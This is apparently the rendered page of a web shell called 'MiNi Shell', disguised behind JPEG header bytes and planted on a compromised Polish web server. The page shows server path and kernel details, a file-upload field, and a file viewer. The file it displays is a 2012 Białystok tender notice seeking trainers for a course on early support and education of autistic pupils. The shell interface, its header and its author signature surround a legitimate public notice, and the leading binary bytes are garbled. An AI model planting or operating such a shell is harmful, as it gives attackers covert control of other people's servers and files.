JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120905/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120905/332026-N-2012.html

<p class="kh_header"><b>Białystok: Wybór kadry szkoleniowej do przeprowadzenia zajęć na kursie kwalifikacyjnym z zakresu wczesnego wspomagania rozwoju i edukacji uczniów autystycznych</b><br>
<b>Numer ogłoszenia: 332026 - 2012; data zamieszczenia: 05.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Centrum Edukacji Nauczycieli w Białymstoku , ul. Złota 4, 15-016 Białystok, woj. podlaskie, tel. 0-85 7329867, 7328087, faks 0-85 7329865.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.cen.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wybór kadry szkoleniowej do przeprowadzenia zajęć na kursie kwalifikacyjnym z zakresu wczesnego wspomagania rozwoju i edukacji uczniów autystycznych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wybór kadry szkoleniowej do przeprowadzenia zajęć na kursie kwalifikacyjnym z zakresu wczesnego wspomagania rozwoju i edukacji uczniów autystycznych.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca przedstawi wykaz swoich kwalifikacji niezbędnych do wykonania przedmiotu zamówienia, na który Wykonawca składa ofertę, zgodnie z zaleceniami Zamawiającego</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca udokumentuje doświadczenie zgodnie z zaleceniami Zamawiającego</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunki udziału w postępowaniu oraz brak podstaw do wykluczenia będą oceniane, na podstawie: spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.cenb.wrotapodlasia.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Centrum Edukacji Nauczycieli  
ul. Złota 4, 15-016 Białystok  pokój nr 109 w godz. 9-14.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.09.2012 godzina 10:00, miejsce: Centrum Edukacji Nauczycieli  
ul. Złota 4, 15-016 Białystok  pokój nr 110.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PEDAGOGIKA SPECJALNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1.1.Tematyka: 
1.Prawa osób niepełnosprawnych, podstawowe dokumenty.
2.Karta i deklaracja praw osób z autyzmem i inne ważne dokumenty
liczba godzin - 6,  wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PEDAGOGIKA SPECJALNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1.1.Tematyka: 
1.Prawa osób niepełnosprawnych, podstawowe dokumenty.
2.Karta i deklaracja praw osób z autyzmem i inne ważne dokumenty
liczba godzin - 6,  wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PEDAGOGIKA SPECJALNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.1.3.Tematyka: 
1.Główne nurty rewalidacji w poszczególnych działach pedagogiki specjalnej. 
2.Wczesne wspomaganie rozwoju małych dzieci  niepełnosprawnych lub zagrożonych niepełnosprawnością i wspomaganie ich rodzin.
3.Przegląd metod stosowanych w pedagogice specjalnej.    
 liczba godzin - 12,  wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> ELEMENTY PSYCHOLOGII KLINICZNEJ MAŁEGO DZIECKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.2.1.  Tematyka:
1.Koncepcja rozwoju psychicznego człowieka
2.Norma a patologia; przedmiot i zadania psychologii klinicznej małego dziecka
3.Rozwój małego dziecka 
koncepcja więzi emocjonalnych wg. Bowlby
koncepcja reprezentacji relacji matka- dziecko i reprezentacja siebie
4.Wczesne zaburzenia rozwojowe
5.Problemy rozpoznawania zaburzeń i diagnoza rozwojowa  
 liczba godzin - 30,         wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> WCZESNY AUTYZM DZIECIĘCY - DIAGNOZA I TERAPIA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.3.1. Tematyka:                                             
1.Wczesny autyzm dziecięcy (symptologia, etiologia i epidemiologia)
2.Problemy biomedyczne, neurologiczne i sensoryczne występujące u osób autystycznych (diagnoza i strategie pomocy)
3.Diagnoza w autyzmie dziecięcym
4.Inteligencja osób autystycznych
5.Funkcjonowanie społeczno- emocjonalne osób autystycznych
6.Ekspresja słowna i trudności w porozumiewaniu się z osobami autystycznymi
7.Omówienie wybranych typologii osób autystycznych ( typologia Wing, Christie, Eawes i Nikolskiej), użyteczność różnych typologii w planowaniu działań terapeutycznych i edukacyjnych
8.Wybrane metody i formy terapii osób autystycznych
-Terapia behawioralna
-Niedyrektywne metody terapii       
 liczba godzin - 100,  wykładowca -  1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> WCZESNE WSPOMAGANIE ROZWOJU DZIECI  
                          AUTYSTYCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.4.1.Tematyka:
1.Kompetencje nauczyciela realizującego zajęcia wczesnego wspomagania.
2.Funkcjonalna ocena rozwoju małego dziecka autystycznego z zastosowaniem wywiadu z rodzicami 
3.Metody terapii, strategie oddziaływań i programy edukacyjne, które okazały się skuteczne w pracy z małymi dziećmi.
4.Strukturalizacja najbliższego otoczenia dziecka i zachodzących w nim zaburzeń 
5.Struktura zadaniowa i dobór treści zadaniowych do indywidualnego programu wczesnego wspomagania rozwoju.
6.Zasady konstruowania planów z grupą.
 liczba godzin - 30,  wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> NAUCZANIE I WYCHOWANIE DZIECI AUTYSTYCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.5.1.Tematyka: 

1.System kształcenia uczniów (standardy dotyczące placówek oświatowych  
      oraz form i metod edukacji)
2.Ocena gotowości dziecka do podjęcia nauki w szkole oraz wybór 
      właściwej placówki.
3.Nauczanie indywidualne oraz funkcjonowanie uczniów autystycznych w 
      szkołach masowych i integracyjnych. Rola nauczyciela wspomagającego.
4.Specyficzne aspekty procesu dydaktycznego i strategie nauczania oraz wychowywania stosowane na różnych etapach kształcenia.
5.Konstruowanie programów edukacji uczniów autystycznych w szkole podstawowej, gimnazjum i w liceum.
6.Ogólne zasady planowania pracy w szkole    
7.Planowanie bieżącej pracy (konstrukcja planów pracy z grupą w określonym przedziale czasowym, planowanie pracy dziennej, konstruowanie konspektów i scenariuszy zajęć lekcyjnych oraz zapis w dzienniku, monitorowanie rozwoju uczniów i ocenianie poziomuich funkcjonowania, planowanie współpracy z rodziną).
8.Przygotowanie do nauki szkolnej
9.Techniki ułatwiające uczniom autystycznym koncentrację na zadaniu i 
      kontrolowanie emocji i nastroju
10.Przysposobienia do pracy uczniów autystycznych w aspekcie ich 
      możliwości psychofizycznych.
11.Autyzm a dojrzewanie 
12.Jakość życia dorosłych osób autystycznych.       
 liczba godzin - 90,   wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> STYMULACJA I INTEGRACJA SENSORYCZNO- MOTORYCZNA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.6.1. Tematyka:
1.Percepcja dzieci autystycznych. Wpływ zaburzeń integracji sensorycznej na  
     uczenie się i zachowanie.
2.Teoria integracji sensorycznej Jean Ayres - podstawowe pojęcia.
3.Funkcjonowanie zmysłów i integracja sensoryczna we wczesnym dzieciństwie
4.Sensoryzm i deficyty integracji sensorycznej (diagnoza, strategie postępowania i terapii)
5.Konstruowanie programu podstawowego (dobór ćwiczeń stymulujących poszczególne zmysły i normalizujących funkcjonowanie kanałów sensorycznych, integracja sensoryczno- motoryczna).
6.Warunki realizacji programu i prowadzenia dokumentacji.
7.Okresowa analiza dokumentów pod kątem oceny zmian w funkcjonowaniu dziecka.
8.Ocena efektów terapii
liczba godzin - 10,   wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> METODY KOMUNIKACJI ALTERNATYWNEJ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.7.1. Tematyka: 
1.Komunikacja wspomagająca i alternatywna (terminologia, rodzaje znaków i 
     symboli, dobór systemów znaków)
2.Wielospecjalistyczne badania i diagnoza potencjalnych uczestników komunikacji
      alternatywnej
3.Nauczanie w sytuacjach naturalnych i w placówce (miejsce prowadzenia i czas trwaniazajęć, kreowanie sytuacji uczenia, generalizacja).
4.Strategie nauczania i dobór pierwszych znaków
5.Konstruowanie wypowiedzi złożonych z kilku znaków i dalszy rozwój słownictwa.
6.Umiejętności prowadzenia rozmowy
7.Albumy aktywności
8.Pomoce dydaktyczne
liczba godzin - 20,  wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> STYMULACJA ROZWOJU PSYCHORUCHOWEGO MAŁEGO  DZIECKA.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.8.1. Tematyka:
1.Rozwój mózgu i umysłu w pierwszych pięciu latach życia.
2.Rozwój zdolności zapamiętywania i uczenia się we wczesnym dzieciństwie
3.Zasady, metody i techniki stymulowania rozwoju psychoruchowego.
4.Diagnoza możliwości rozwojowych dzieci autystycznych oraz zasady, metody i techniki pracy edukacyjno- terapeutycznej
5.Etapy pracy terapeutyczno - edukacyjnej z dziećmi autystycznymi 
      (nawiązanie kontaktu, pobudzanie zmysłów, integracja zmysłowo- ruchowa, 
      poznanie i rozumienie swojego ciała, wypracowanie gotowości do uczenia,  
      edukacja elementarna.
liczba godzin -20,  wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> KOMPETENCJE INSTYTUCJONALNE W PRACY NAUCZYCIELA TERAPEUTY, PRAWO OŚWIATOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 2.9.1. Tematyka:
1.Struktura systemu edukacji
2.Struktura systemu pomocy społecznej
3.Analiza porównawcza polskich systemów z rozwiązaniami przyjętymi w wybranych krajach Unii Europejskiej
4.Wybrane zagadnienia prawne
- prawo oświatowe, obowiązujące ustawy i akty wykonawcze
- rozwiązania prawne oraz regulacje dotyczące funkcjonowania placówek kształcenia specjalnego i ośrodków terapeutycznych
- udział organizacji pozarządowych
liczba godzin - 20, wykładowca - 1 osoba.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com